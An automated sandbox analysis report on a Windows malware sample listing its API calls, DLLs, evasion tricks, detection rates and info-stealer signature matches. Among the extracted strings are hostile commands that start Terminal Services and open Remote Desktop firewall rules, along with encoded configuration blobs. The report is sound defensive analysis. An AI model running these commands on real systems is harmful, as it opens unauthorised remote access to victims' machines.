          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CBE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,0_2_00CBE8D0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeMutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c
          Source: 6uHfmjGMfL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 6uHfmjGMfL.exeVirustotal: Detection: 55%
          Source: 6uHfmjGMfL.exeReversingLabs: Detection: 63%
          Source: 6uHfmjGMfL.exeString found in binary or memory: " /add /y
          Source: 6uHfmjGMfL.exeString found in binary or memory: " /add
          Source: 6uHfmjGMfL.exeString found in binary or memory: " /add /y
          Source: 6uHfmjGMfL.exeString found in binary or memory: " /add
          Source: 6uHfmjGMfL.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 6uHfmjGMfL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 6uHfmjGMfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 6uHfmjGMfL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 6uHfmjGMfL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 6uHfmjGMfL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 6uHfmjGMfL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 6uHfmjGMfL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: 6uHfmjGMfL.exeStatic PE information: section name: sqaf
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA111 push ecx; ret 0_2_00CDA124
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDC547 push ebx; ret 0_2_00CDC586
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CD923D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CD923D
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeWindow / User API: threadDelayed 6094Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeWindow / User API: threadDelayed 3735Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636Thread sleep count: 6094 > 30Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636Thread sleep time: -182820000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3552Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636Thread sleep count: 3735 > 30Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636Thread sleep time: -112050000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CEF0C1 FindFirstFileExW,0_2_00CEF0C1
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB93D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,0_2_00CB93D0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeThread delayed: delay time: 30000Jump to behavior
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, 6uHfmjGMfL.exe, 00000000.00000002.4482159643.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDA2F5
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CE6142 mov eax, dword ptr fs:[00000030h]0_2_00CE6142
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDDCB0 mov eax, dword ptr fs:[00000030h]0_2_00CDDCB0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CF0642 GetProcessHeap,0_2_00CF0642
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDA2F5
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA458 SetUnhandledExceptionFilter,0_2_00CDA458
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDECBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDECBD
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CD9A08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CD9A08

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_00CB8070
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA4DF cpuid 0_2_00CDA4DF
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,0_2_00CF2171
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: EnumSystemLocalesW,0_2_00CF22FE
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: EnumSystemLocalesW,0_2_00CF2263
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: EnumSystemLocalesW,0_2_00CF2218
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00CF2389
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: EnumSystemLocalesW,0_2_00CE830C
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,0_2_00CF25DC
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00CF2702
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00CF28D7
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,0_2_00CF2808
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetLocaleInfoW,0_2_00CE882E
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00CF1F76
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeQueries volume information: C:\Users\user\Desktop\6uHfmjGMfL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDA705 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CDA705
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_00CB61F0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CEE7DE _free,_free,_free,GetTimeZoneInformation,_free,0_2_00CEE7DE
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB91B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,0_2_00CB91B0

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: 6uHfmjGMfL.exe, type: SAMPLE
          Source: Yara matchFile source: 0.0.6uHfmjGMfL.exe.cb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.6uHfmjGMfL.exe.cb0000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality

          barindex
          Source: 6uHfmjGMfL.exeString found in binary or memory: net start termservice
          Source: 6uHfmjGMfL.exe, 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
          Source: 6uHfmjGMfL.exe, 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
          Source: 6uHfmjGMfL.exeString found in binary or memory: net start termservice
          Source: 6uHfmjGMfL.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit 